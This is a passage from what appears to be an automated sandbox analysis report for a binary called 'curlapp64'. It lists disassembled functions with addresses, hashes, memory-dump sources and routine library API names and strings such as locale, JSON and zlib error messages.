                                                                                                                                                                                                  • Opcode Fuzzy Hash: c987dc07aa77382b82d933b9bd73357070bbf54a8ef333fe3d2b907b2246b907
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69D15832E08A818AEF619F6594403AD77F0FB45799F104136EE8D97B9ADF38E491C620
                                                                                                                                                                                                  Function 00007FF6CF9A1370 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 177COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                  • String ID: bad locale name$false$true$ZYo
                                                                                                                                                                                                  • API String ID: 3230409043-478441404
                                                                                                                                                                                                  • Opcode ID: 598a93e3e168cd54211d936885fd64af63daf99834e5f7f70888c9f4ce7b4bec
                                                                                                                                                                                                  • Instruction ID: 09f0a63f6d1261cde0790fbe0ee66272396723a73c55bba75eb374e0a7641ec1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 598a93e3e168cd54211d936885fd64af63daf99834e5f7f70888c9f4ce7b4bec
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47817C22E29B818AEB10CF60E4902AD77B0FF84744F551135EACDA7A6EDF38D491C760
                                                                                                                                                                                                  Function 00007FF6CF974020 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 167COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: at line $, column $>$ZYo
                                                                                                                                                                                                  • API String ID: 0-2551122580
                                                                                                                                                                                                  • Opcode ID: cff93c34664bbef36832d4fde2d669a555cfac1a9def6137c8e9bf10f9397447
                                                                                                                                                                                                  • Instruction ID: 73cc24db0c87b9c2e9ca065b706c5138938de36fdfe5428b990e1ba81eb1efa9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cff93c34664bbef36832d4fde2d669a555cfac1a9def6137c8e9bf10f9397447
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3361C162B08B8581EE14DF29E4113AA63A1EB85BD0F408232EA9D47B9FDF3DD581C750
                                                                                                                                                                                                  Function 00007FF6CF99CC70 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 140COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big
                                                                                                                                                                                                  • API String ID: 909987262-180087107
                                                                                                                                                                                                  • Opcode ID: 7d7aeedf4cb3237edec35eae6c4b2a75e7facbbbcb7e6c785a36e9f799910acc
                                                                                                                                                                                                  • Instruction ID: ead6b082130361361e3ab285c47f83289d9ba8a348e56b6e969235f784db57cf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d7aeedf4cb3237edec35eae6c4b2a75e7facbbbcb7e6c785a36e9f799910acc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9051E522E085438AEF259F18D4501BD3360FF90B96F954132E7DE825DAEF2CEA85C760
                                                                                                                                                                                                  Function 00007FF6CF992010 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 136COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big
                                                                                                                                                                                                  • API String ID: 909987262-180087107
                                                                                                                                                                                                  • Opcode ID: 5af9ae905e1eaa496e73f90bca387dcf238ee655075c3ae96b7f78e78d35d6de
                                                                                                                                                                                                  • Instruction ID: 04f84bdbf8809b9a7f1e22fa701b65d3c0572a86c17ac9f3f20c35e2451a95e3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5af9ae905e1eaa496e73f90bca387dcf238ee655075c3ae96b7f78e78d35d6de
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B251F422A0C5464AEF258F28D0502B93361FF51766F554131D3EDC22EFDE2DE696C722
                                                                                                                                                                                                  Function 00007FF6CF9A36E0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                  • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                  • API String ID: 667068680-1247241052
                                                                                                                                                                                                  • Opcode ID: 8f1dabe6bbf128b779a5ac82c94236a7cc606a5a8d2a655be2aee59edd3a0333
                                                                                                                                                                                                  • Instruction ID: 0446421e787e5f87b0c4966f8a0e8277593bbbd1dc0e9ada8f63649228d26a4f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f1dabe6bbf128b779a5ac82c94236a7cc606a5a8d2a655be2aee59edd3a0333
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F0DA34E0DB03D1EF10AF51F8590A033A4BB18B42B845071C89EC3329EE7DA099C361
                                                                                                                                                                                                  Function 00007FF8B9F66050 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B9F65F47), ref: 00007FF8B9F66077
                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B9F65F47), ref: 00007FF8B9F66087
                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B9F65F47), ref: 00007FF8B9F660EA
                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B9F65F47), ref: 00007FF8B9F660F4
                                                                                                                                                                                                    • Part of subcall function 00007FF8B9F65230: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9F6525D
                                                                                                                                                                                                    • Part of subcall function 00007FF8B9F65230: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9F652C0
                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B9F65F47), ref: 00007FF8B9F66129
                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B9F65F47), ref: 00007FF8B9F66133
                                                                                                                                                                                                  • memmove.VCRUNTIME140(?,?,?,00007FF8B9F65F47), ref: 00007FF8B9F661EB
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$malloc$memmove
                                                                                                                                                                                                  • String ID: 1.3.1$out of memory
                                                                                                                                                                                                  • API String ID: 2623842526-361156306
                                                                                                                                                                                                  • Opcode ID: b35b446a4dc455d582adfb2a798707482938eb642aba472980352d661cf5840a
                                                                                                                                                                                                  • Instruction ID: 3c14d7e55a1949e8d93169d0f4f1e64b83c11ec4b8ef3aa84b1ab0463349dcff
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b35b446a4dc455d582adfb2a798707482938eb642aba472980352d661cf5840a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3251C032A1879186E750CF29E44026C37A4FB49FE9F146236EB1D87799CF38E891C700
                                                                                                                                                                                                  Function 00007FF6CF9A37A8 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 239COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 2984826149-278324492
                                                                                                                                                                                                  • Opcode ID: a4ae477cd1e76dea8615bdd881bdf2b9848966a3ce02d94f99ccd202125ce3c7
                                                                                                                                                                                                  • Instruction ID: bcf358ee89a23b988d56e3f1577d370b18acbfd6a95a451c8478c7307eb0870c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4ae477cd1e76dea8615bdd881bdf2b9848966a3ce02d94f99ccd202125ce3c7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1A1D222E0869286EF618F2490157B977D1EF40B9AF244631DA9D87BCEEF7ED404C320
                                                                                                                                                                                                  Function 00007FF6CF975B40 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 210COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: http://$ZYo
                                                                                                                                                                                                  • API String ID: 3668304517-3494531113
                                                                                                                                                                                                  • Opcode ID: f5104746fe4c3a50d441d46e4d7e5d4a0dde735f4061be2f1d002db0f2ca0df5
                                                                                                                                                                                                  • Instruction ID: 19a175de1ceda8127f989785de97ad1bc14b35cd632e888ce02d103928e71f6e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5104746fe4c3a50d441d46e4d7e5d4a0dde735f4061be2f1d002db0f2ca0df5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0281C162F19B8646FF409F75D0053BC1362AB45BE9F104632DEAC97BDFEE28E4858250
                                                                                                                                                                                                  Function 00007FF6CF9A33E4 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 2829165498-278324492
                                                                                                                                                                                                  • Opcode ID: 15a0a3d4e2dd200d7bd002b8eeaa938841076b27f4ed156a0dd1d76035cb24b4
                                                                                                                                                                                                  • Instruction ID: a58622e13303f7deb72222cf2f9b010e729a684898b12e20335da846798dae03
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15a0a3d4e2dd200d7bd002b8eeaa938841076b27f4ed156a0dd1d76035cb24b4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F819F72E0874186EF608F25A44066977E5FF447A9F644631EA9D87BDEDF3DD4008720
                                                                                                                                                                                                  Function 00007FF6CF990C00 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 154COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                                                                                  • String ID: type_error$ZYo
                                                                                                                                                                                                  • API String ID: 1944019136-3996526194
                                                                                                                                                                                                  • Opcode ID: d3ecc02fc515bb16589edf71671af8ced29e47fef5d79793d8e81eb4667b39ff
                                                                                                                                                                                                  • Instruction ID: e0e6444dc8a034f799dbe209956dcd64136bb5852e490786a4b9575e59b90a0f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3ecc02fc515bb16589edf71671af8ced29e47fef5d79793d8e81eb4667b39ff
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A51C262E15B8599EF00DF74D4503AC2361EF453A5F519332EAAC92AEFEF29E194C310
                                                                                                                                                                                                  Function 00007FF6CF983750 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 154COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                                                                                  • String ID: other_error$ZYo
                                                                                                                                                                                                  • API String ID: 1944019136-2110943726
                                                                                                                                                                                                  • Opcode ID: d682a5106e7eb6480370ff3bdbd1ac13d4b3c1e55569ba47c5f9a6ca762bd19e
                                                                                                                                                                                                  • Instruction ID: 201c9e61c769d39a6422f2e06426005c997780017bd6ee87eff6aeefd44e8364
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d682a5106e7eb6480370ff3bdbd1ac13d4b3c1e55569ba47c5f9a6ca762bd19e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0551B162E19B8195EF00DF75D4507AC2361EB493A5F509332EAAD93ADEEF29E190C310
                                                                                                                                                                                                  Function 00007FF6CF988680 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 150COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                                                                                  • String ID: invalid_iterator$ZYo
                                                                                                                                                                                                  • API String ID: 1944019136-2970369336
                                                                                                                                                                                                  • Opcode ID: 5252c07180c3dbb41a23400cae29d23536e08ea941c2d7d7cad19dedf0638887
                                                                                                                                                                                                  • Instruction ID: 9fce49a1b9d10fa94a120b841b909dd7cdac1e59e8f2c4f89f94cc73a0a10cf1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5252c07180c3dbb41a23400cae29d23536e08ea941c2d7d7cad19dedf0638887
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E51BF62F18B4695EF00DF74D4503AD2361EB453A5F509332EAAD92ADEEE38E195C320
                                                                                                                                                                                                  Function 00007FF8B9F66A00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _errno_writemallocstrerror
                                                                                                                                                                                                  • String ID: internal error: deflate stream corrupt
                                                                                                                                                                                                  • API String ID: 673104255-3609297558
                                                                                                                                                                                                  • Opcode ID: b72e94be7e9c6a20d78fdebd562fe1faeb42a5c575c419178ad16cfa9b5108c0
                                                                                                                                                                                                  • Instruction ID: 21a96b21e4d3226a3ebe80467e24f3250e06d03bf15e0d052043cf83937df97e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b72e94be7e9c6a20d78fdebd562fe1faeb42a5c575c419178ad16cfa9b5108c0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21516271A09B8286EB149F69D55023932A1FB86BF6F14A135DB1E437D4DF3CE8A0C740
                                                                                                                                                                                                  Function 00007FF6CF976760 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_RegisterSetgloballocalestd::locale::_
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 1858502957-278324492
                                                                                                                                                                                                  • Opcode ID: 18d75542bb58cd4ede05d2349806faadd251bf666efbcb7077eeae8f896a1538
                                                                                                                                                                                                  • Instruction ID: 3add147de6a3ef5e8af239878ebff8f115c8610fcfcc86fe0cfee9eaae39147b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18d75542bb58cd4ede05d2349806faadd251bf666efbcb7077eeae8f896a1538
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C41C122A18B4282EE58EF15E4404B9B7A0FF44B91F544432EEDE8339ADF3CE446C320
                                                                                                                                                                                                  Function 00007FF6CF997450 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 102COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
